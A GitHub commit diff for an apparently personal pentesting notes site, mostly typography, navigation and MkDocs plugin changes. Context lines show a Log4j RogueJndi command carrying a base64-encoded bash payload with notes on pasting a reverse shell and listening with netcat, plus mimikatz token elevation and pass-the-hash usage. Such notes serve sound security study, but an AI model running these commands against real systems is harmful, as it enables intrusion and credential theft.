style: Changes of typography and some minor UI fixes

amandaguglieri · Nov 25, 2023 · a01265d · a01265d
1 parent ea69643
commit a01265d
Show file tree

Hide file tree

Showing 7 changed files with 129 additions and 28 deletions.
diff --git a/docs/cloud/azure/az-500-ad-1-identity-and-access.md b/docs/cloud/azure/az-500-ad-1-identity-and-access.md
@@ -129,7 +129,7 @@ The following table is offered as an aid to understanding these role categories.
 
 |Category|Role|
 |---|---|
-|Azure AD-specific roles|Application Administrator  <br>Application Developer  <br>Authentication Administrator  <br>Business to consumer (B2C) Identity Experience Framework (IEF) Keyset Administrator  <br>Business to consumer (B2C) Identity Experience Framework (IEF) Policy Administrator  <br>Cloud Application Administrator  <br>Cloud Device Administrator  <br>Conditional Access Administrator  <br>Device Administrators  <br>Directory Readers  <br>Directory Synchronization Accounts  <br>Directory Writers  <br>External ID User Flow Administrator  <br>External ID User Flow Attribute Administrator  <br>External Identity Provider Administrator  <br>Groups Administrator  <br>Guest Inviter  <br>Helpdesk Administrator  <br>Hybrid Identity Administrator  <br>License Administrator  <br>Partner Tier1 Support  <br>Partner Tier2 Support  <br>Password Administrator  <br>Privileged Authentication Administrator  <br>Privileged Role Administrator  <br>Reports Reader  <br>User Administrator|
+|Azure AD-specific roles|Application Administrator  <br>Application Developer  Authentication Administrator  <br>Business to consumer (B2C) Identity Experience Framework (IEF) Keyset Administrator  <br>Business to consumer (B2C) Identity Experience Framework (IEF) Policy Administrator  <br>Cloud Application Administrator  <br>Cloud Device Administrator  <br>Conditional Access Administrator  <br>Device Administrators  <br>Directory Readers  <br>Directory Synchronization Accounts  <br>Directory Writers  <br>External ID User Flow Administrator  <br>External ID User Flow Attribute Administrator  <br>External Identity Provider Administrator  <br>Groups Administrator  <br>Guest Inviter  <br>Helpdesk Administrator  <br>Hybrid Identity Administrator  <br>License Administrator  <br>Partner Tier1 Support  <br>Partner Tier2 Support  <br>Password Administrator  <br>Privileged Authentication Administrator  <br>Privileged Role Administrator  <br>Reports Reader  <br>User Administrator|
 |Cross-service roles|Global Administrator  <br>Compliance Administrator  <br>Compliance Data Administrator  <br>Global Reader  <br>Security Administrator  <br>Security Operator  <br>Security Reader  <br>Service Support Administrator|
 |Service-specific roles|Azure DevOps Administrator  <br>Azure Information Protection Administrator  <br>Billing Administrator  <br>Customer relationship management (CRM) Service Administrator  <br>Customer Lockbox Access Approver  <br>Desktop Analytics Administrator  <br>Exchange Service Administrator  <br>Insights Administrator  <br>Insights Business Leader  <br>Intune Service Administrator  <br>Kaizala Administrator  <br>Lync Service Administrator  <br>Message Center Privacy Reader  <br>Message Center Reader  <br>Modern Commerce User  <br>Network Administrator  <br>Office Apps Administrator  <br>Power BI Service Administrator  <br>Power Platform Administrator  <br>Printer Administrator  <br>Printer Technician  <br>Search Administrator  <br>Search Editor  <br>SharePoint Service Administrator  <br>Teams Communications Administrator  <br>Teams Communications Support Engineer  <br>Teams Communications Support Specialist  <br>Teams Devices Administrator  <br>Teams Administrator|
 

diff --git a/docs/htb-cheatsheat-password-attacks.md → docs/htb-cheatsheet-password-attacks.md b/docs/htb-cheatsheat-password-attacks.md → docs/htb-cheatsheet-password-attacks.md
diff --git a/docs/log4j.md b/docs/log4j.md
@@ -77,7 +77,7 @@ java -jar rogue-jndi/target/RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtY
 # In the bash command, copy paste your reverse shell in base64
 # --hostname: Victim IP
 
-# Now, open a terminal, launch netcat abd the listening port you defined in your payload.
+# Now, open a terminal, launch [[netcat]] abd the listening port you defined in your payload.
 ```
 
 With Burpsuite, get a request for login:

diff --git a/docs/mimikatz.md b/docs/mimikatz.md
@@ -25,6 +25,7 @@ Download from github repo: [https://github.com/gentilkiwi/mimikatz](https://gith
 
 ## Basic usage
 
+
 ```bash
 # Impersonate as NT Authority/SYSTEM (having permissions for it).
 token::elevate
@@ -45,4 +46,5 @@ mimikatz.exe privilege::debug "sekurlsa::pth /user:<username> /rc4:<NTLM hash> /
 # /run:<Command>: For example /run:cmd.exe
 # 2. After that, we canuse cmd.exe to execute commands in the user's context. 
 
+```
 
diff --git a/docs/my-mkdocs-material-customization.md b/docs/my-mkdocs-material-customization.md
@@ -120,3 +120,82 @@ This is how it is seen:
 | `GET`       | Fetch resource  |
 | `PUT`       | Update resource |
 | `DELETE`    | Delete resource |
+
+
+## PDF button in every page
+
+Most of the existing plugins offer a print-all-in-one-file solution, which is not my intended development.
+
+
+#### mkdocs-pdf-export-plugin
+
+[https://github.com/zhaoterryy/mkdocs-pdf-export-plugin](https://github.com/zhaoterryy/mkdocs-pdf-export-plugin)
+
+Install and add to gh-deploy workflow:
+
+```bash
+pip install mkdocs-pdf-export-plugin
+```
+
+
+mkdocs.yml
+
+```yaml
+plugins:
+    - search
+    - pdf-export:
+        verbose: true
+        combined: false
+        media_type: print
+        enabled_if_env: ENABLE_PDF_EXPORT
+```
+
+
+/docs/css/extra.css
+
+```css
+@page {
+    size: a4 portrait;
+    margin: 25mm 10mm 25mm 10mm;
+    counter-increment: page;
+    font-family: "Roboto","Helvetica Neue",Helvetica,Arial,sans-serif;
+    white-space: pre;
+    color: grey;
+    @top-left {
+        content: '© 2018 My Company';
+    }
+    @top-center {
+        content: string(chapter);
+    }
+    @top-right {
+        content: 'Page ' counter(page);
+    }
+}
+```
+
+
+
+## Resolving relative link issues when rendering
+
+[https://octoprint.github.io/mkdocs-site-urls/](https://octoprint.github.io/mkdocs-site-urls/)
+
+
+## Revision date
+
+
+Install and add to gh-deploy workflow:
+
+```bash
+# Installs git revision date plugin globally
+pip install mkdocs-git-revision-date-plugin
+```
+
+
+mkdocs.yml
+
+```yaml
+# Adding the git revision date plugin
+plugins:
+- search
+- git-revision-date
+```
diff --git a/docs/servers.md b/docs/servers.md
@@ -10,6 +10,17 @@ tags:
 
 # Setting up a server (in the attacking machine)
 
+| **Protocol / app** |
+| --- |
+| [smb server](#smb-server) |
+| [Apache server](#apache-server) |
+| [ngix](#ngix) |
+| [symple python server](#simple-python-server) |
+| [php web server](#php-web-server) |
+| [Ruby web server](#ruby-web-server) |
+| Burp Suite Collaborator |
+| [Interactsh](interactsh.md) | 
+
 ## smb server
 
 [Launch smbserver in our attacker machine](smbserver.md):

diff --git a/mkdocs.yml b/mkdocs.yml
@@ -42,7 +42,7 @@ nav:
       - dnsenum: dnsenum.md
       - dnspy: dnspy.md
       - docker: docker.md
-      - dotpeek: dotpeek.md 
+      - dotpeek: dotpeek.md
       - dread: dread.md
       - drozer: drozer.md
       - echo mirage: echo-mirage.md
@@ -99,7 +99,7 @@ nav:
       - netcat: netcat.md
       - netdiscover: netdiscover.md
       - nikto: nikto.md
-      - nishang: nishang.md 
+      - nishang: nishang.md
       - nmap: nmap.md
       - noip: noip.md
       - nslookup: nslookup.md
@@ -110,7 +110,7 @@ nav:
       - openVAS: openvas.md
       - openVASreporting: openvasreporting.md
       - ophcrack: ophcrack.md
-      - owasp-zap: owasp-zap.md 
+      - owasp-zap: owasp-zap.md
       - p0f: p0f.md
       - pentesmonkey: pentesmonkey.md
       - PeSecurity: pesecurity.md
@@ -178,7 +178,7 @@ nav:
           - Notes for the Az-900 exam: cloud/azure/az-900-preparation.md
           - Exams- Practice the Az-900: cloud/azure/az-900-exams.md
       - Az-104 Microsoft Azure Administrator: cloud/azure/az-104-preparation.md
-      - Az-500 Microsoft Azure Security Engineer: 
+      - Az-500 Microsoft Azure Security Engineer:
           - Notes on the certification: cloud/azure/az-500-preparation.md
           - Identity and access: cloud/azure/az-500-ad-1-identity-and-access.md
           - Platform protection: cloud/azure/az-500-ad-2-platform-protection.md
@@ -190,8 +190,9 @@ nav:
           - Index of labs: burpsuite/burpsuite-labs.md
           - SQLi labs: burpsuite/burpsuite-sqli.md
           - XSS labs: burpsuite/burpsuite-xss.md
+      - CPTS: htb-cheatsheet-password-attacks.md
       - eJPT: ejpt.md
-      - Hacking APIs: 
+      - Hacking APIs:
           - Intro: hackingapis/index.md
           - Setting up the environmet: hackingapis/setting-up-kali.md
           - Api Reconnaissance: hackingapis/api-reconnaissance.md
@@ -254,17 +255,17 @@ nav:
       - File tranfer techniques:
         - Linux: transferring-files-techniques-linux.md
         - Windows: transferring-files-techniques-windows.md
-        - Code- netcat python php and others: transferring-files-techniques-code.md 
+        - Code- netcat python php and others: transferring-files-techniques-code.md
         - Bypassing file upload restrictions: file-upload.md
         - File encryption: file-encryption.md
         - Evading techniques when tranferring files: transferring-files-evading-detection.md
         - LOLbas Living off the land binaries: lolbins-lolbas-gtfobins.md
       - How to resolve run of the mill connection problems: how-to-resolve-run-of-the-mill-connection-problems.md
       - How to remove bloatware: remove-bloatware.md
-      - HTTP Authentication schemes: http-authentication-schemes.md 
+      - HTTP Authentication schemes: http-authentication-schemes.md
       - HTTP headers: http-headers.md
       - My mkdocs and material customized setup: my-mkdocs-material-customization.md
-      - NetBIOS: netbios.md      
+      - NetBIOS: netbios.md
       - Network traffic capture: network-traffic-capture.md
       - NT Authority System: nt-authority-system.md
       - operating systems: operating-systems.md
@@ -275,7 +276,7 @@ nav:
       - VPN notes: vpn.md
     - Network Services Pentestings:
         - Index of network services: pentesting-network-services.md
-        - 0-255 icmp: 0-255-ICMP-internet-control-message-protocol.md 
+        - 0-255 icmp: 0-255-ICMP-internet-control-message-protocol.md
         - 21 ftp: 21-ftp.md
         - 22 ssh: 22-ssh.md
         - 23 telnet: 23-telnet.md
@@ -311,11 +312,11 @@ nav:
         - 3389 RDP: 3389-rdp.md
         - 5432 postgresql: 5432-postgresql.md
         - 5060 voip: 1720-5060-5061-voip.md
-        - 5061 voip: 1720-5060-5061-voip.md        
+        - 5061 voip: 1720-5060-5061-voip.md
         - 5985 winrm: 5985-5986-winrm-windows-remote-management.md
         - 5986 winrm: 5985-5986-winrm-windows-remote-management.md
         - 6379 redis: 6379-redis.md
-        - 6653 openflow: 6653-openflow.md  
+        - 6653 openflow: 6653-openflow.md
         - 27017 mongodb: 27017-27018-mongodb.md
         - 27018 mongodb: 27017-27018-mongodb.md
         - 55007 dovecot: 55007-55008-dovecot.md
@@ -324,7 +325,7 @@ nav:
     - Pentesting web:
         - Pentesting browsers: pentesting-browsers.md
         - Enumeration phase: web-enumeration.md
-        - Web Exploitation: 
+        - Web Exploitation:
           - Tools and attacks: web-exploitation.md
           - Buffer overflow attack: buffer-overflow.md
           - Creating malware and custom payloads: payloads.md
@@ -350,9 +351,9 @@ nav:
           - django: django-pentesting.md
           - tomcat: tomcat-pentesting.md
           - wordpress: wordpress-pentesting.md
-    - Pentesting mobile: 
+    - Pentesting mobile:
         - Setting up the mobile pentesting environment: setting-up-mobile-penstesting.md
-    - Pentesting Thick applications: 
+    - Pentesting Thick applications:
         - Tools for pentesting thick clients applications: thick-applications/tools-for-thick-apps.md
         - Introduction: thick-applications/tca-introduction.md
         - Basic lab setup: thick-applications/tca-basic-lab-setup.md
@@ -363,8 +364,8 @@ nav:
         - Reversing and patching thick clients applications: thick-applications/tca-reversing-and-patching.md
         - Common vulnerabilities: thick-applications/tca-common-vulnerabilities.md
         - Checklist when pentesting Thick applications: thick-applications/thick-application-checklist.md
-    - Pentesting Cloud: 
-        - The basics of cloud: 
+    - Pentesting Cloud:
+        - The basics of cloud:
           - Introduction: cloud/pentesting-cloud.md
           - aws essentials: cloud/aws/aws-essentials.md
           - azure essentials: cloud/azure/az-900-preparation.md
@@ -419,13 +420,13 @@ nav:
           - Dirty cow: dirty-cow.md
           - Kernel vulnerabilities: kernel-vulnerability-exploitation.md
           - Lxd privilege escalation: lxd.md
-          - Process capabilities getcap: process-capabilities-getcap.md 
+          - Process capabilities getcap: process-capabilities-getcap.md
           - SSH keys: ssh-keys.md
           - Suid binaries: suid-binaries.md
           - Tools:
             - Enumerate with Linux Privilege Checker: linux-privilege-checker.md
             - Linux Exploit Suggester: linux-exploit-suggester.md
-    - Windows: 
+    - Windows:
         - Credentials storage: windows-credentials-storage.md
         - Active directory: active-directory-ldap.md
         - Attacks:
@@ -435,18 +436,16 @@ nav:
           - Invoke the hash: invoke-the-hash.md
           - Null session attack: windows-null-session-attack.md
           - Pass the hash: pass-the-hash.md
-        - Privilege Escalation: 
+        - Privilege Escalation:
           - Index of Privilege escalation: index-windows-privilege-escalation.md
           - Access to history of access to files or commands: windows-privilege-escalation-history.md
           - Windows binaries: windows-binaries.md
         - Persistence:
           - Create a Registry: create-a-registry.md
     - Lateral movements: lateral-movements.md
-    - Cryptography: cryptography.md 
+    - Cryptography: cryptography.md
     - Forensic: computer-forensic-fundamentals.md
-    - OSCP notes: 
-      - Password attacks: htb-cheatsheat-password-attacks.md
-    - Wireless security: wireless-security.md
+    - Wireless scurity: wireless-security.md
     - Downloads: files/index-of-files.md
 theme:
   name: material
@@ -460,10 +459,12 @@ theme:
     - search.highlight
   icon:
     logo: material/alpha-h-box
-    admonition: 
+    admonition:
       <type>: material/alert-box-outline
   favicon: img/favicon.png
-
+  font:
+    text: Lato
+    code: Lato Mono
   palette:
     # Light mode
     - media: '(prefers-color-scheme: light)'
@@ -487,7 +488,16 @@ plugins:
   - search
   - tags:
       tags_file: tags.md
+  - pdf-export:
+      verbose: true
+      enabled_if_env: ENABLE_PDF_EXPORT
 
+extra:
+  social:
+    - icon: fontawesome/brands/linkedin
+      link: https://www.linkedin.com/in/amandaguglieri
+    - icon: fontawesome/brands/github
+      link: https://github.com/amandaguglieri
 
 extra_css:
     - css/extra.css
@@ -496,7 +506,6 @@ extra_javascript:
   - https://unpkg.com/[email protected]/dist/tablesort.min.js
   - javascripts/tablesort.js
 
-
 markdown_extensions:
     - admonition
     - pymdownx.details